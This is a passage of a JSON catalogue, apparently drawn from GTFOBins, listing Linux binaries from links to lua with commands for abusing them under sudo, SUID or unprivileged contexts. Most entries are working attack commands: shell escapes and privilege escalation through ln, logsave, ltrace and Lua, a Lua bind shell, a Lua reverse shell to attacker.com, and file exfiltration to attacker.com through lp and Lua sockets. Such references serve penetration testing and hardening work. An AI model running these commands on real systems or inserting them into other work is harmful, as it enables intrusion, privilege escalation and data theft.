reference","availability":"Check installation","aliases":[]},{"id":"gtfo:links:file-read:0:sudo","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/links/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:links:file-read:0:suid","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/links/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:links:file-read:0:unprivileged","toolId":"gtfo:links","toolName":"links","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"links /path/to/input-file","description":"The result is displayed in a TUI interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/links/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ln:privilege-escalation:0:sudo","toolId":"gtfo:ln","toolName":"ln","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"ln -fs /bin/sh /bin/ln\nln","description":"This overrides `ln` itself with a symlink to a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `ln` by path. Warning, this is a destructive action.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ln/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:loginctl:shell:0:sudo","toolId":"gtfo:loginctl","toolName":"loginctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"loginctl user-status\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/loginctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:loginctl:shell:0:unprivileged","toolId":"gtfo:loginctl","toolName":"loginctl","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"loginctl user-status\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/loginctl/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-read:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-read:0:suid","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-read:0:unprivileged","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"logrotate /path/to/input-file","description":"The first word is returned in a error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-write:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-write:0:suid","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:file-write:0:unprivileged","toolId":"gtfo:logrotate","toolName":"logrotate","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"logrotate -l /path/to/output-file DATA","description":"The content is written in a log file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logrotate:shell:0:sudo","toolId":"gtfo:logrotate","toolName":"logrotate","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '/path/to/temp-file.config {\\nmail x@x.x\\n}' >/path/to/temp-file.config\necho '/bin/sh 0<&2 1>&2' >/path/to/temp-file.sh\nlogrotate -m /path/to/temp-file.sh -f /path/to/temp-file","description":"This command is picky about file permissions. An existing config file can be used as weel, provided that it contains a mail directive.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logrotate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logsave:shell:0:sudo","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/logsave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logsave:shell:0:suid","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/logsave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:logsave:shell:0:unprivileged","toolId":"gtfo:logsave","toolName":"logsave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"logsave /dev/null /bin/sh -i","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/logsave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:look:file-read:0:sudo","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/look/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:look:file-read:0:suid","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/look/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:look:file-read:0:unprivileged","toolId":"gtfo:look","toolName":"look","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"look '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/look/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lp:upload:0:sudo","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lp:upload:0:suid","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lp:upload:0:unprivileged","toolId":"gtfo:lp","toolName":"lp","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"lp /path/to/input-file -h attacker.com","description":"This requires `cups` to be installed. Run the following on the attacker box beforehand:\n\n1. `lpadmin -p printer -v socket://localhost -E` to create a virtual printer;\n2. `lpadmin -d printer` to set the new printer as default;\n3. `cupsctl --remote-any` to enable printing from the Internet.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-read:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-read:0:suid","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-read:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ltrace -F /path/to/input-file /dev/null","description":"The file is parsed as a configuration file and its content is shown as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-write:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ltrace -s 999 -o /path/to/input-file ltrace -F DATA","description":"The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:file-write:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ltrace -s 999 -o /path/to/input-file ltrace -F DATA","description":"The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough instead of `999`. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of `ltrace -F DATA`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:shell:0:sudo","toolId":"gtfo:ltrace","toolName":"ltrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ltrace -b -L /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ltrace:shell:0:unprivileged","toolId":"gtfo:ltrace","toolName":"ltrace","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ltrace -b -L /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ltrace/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:bind-shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:bind-shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:bind-shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"bind-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n while true do\n local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));c:send(b);\n end;c:close();f:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:download:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:download:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:download:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"lua -e '\n local k=require(\"socket\");\n local s=assert(k.bind(\"*\",12345));\n local c=s:accept();\n local d,x=c:receive(\"*a\");\n c:close();\n local f=io.open(\"/path/to/output-file\", \"wb\");\n f:write(d);\n io.close(f);'","description":"This requires `lua-socket` to be available.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-read:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-read:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-read:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"lua -e 'local f=io.open(\"/path/to/input-file\", \"rb\"); io.write(f:read(\"*a\")); io.close(f);'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-write:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-write:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:file-write:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"lua -e 'local f=io.open(\"/path/to/output-file\", \"wb\"); f:write(\"DATA\"); io.close(f);'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:reverse-shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:reverse-shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:reverse-shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"lua -e '\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n while true do\n local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n local b=assert(f:read(\"*a\"));t:send(b);\n end;\n f:close();t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:shell:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:shell:0:suid","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:shell:0:unprivileged","toolId":"gtfo:lua","toolName":"lua","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"lua -e 'os.execute(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lua:upload:0:sudo","toolId":"gtfo:lua","toolName":"lua","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"lua -e '\n local f=io.open(\"/path/to/input-file\", \"rb\")\n local d=f:read(\"*a\")\n io.close(f);\n local s=require(\"socket\");\n local t=assert(s.tcp());\n t:connect(\"attacker.com\",12345);\n t:send(d);\n t:close();'","description":"This requires `lua-socket` to be available.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lua/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 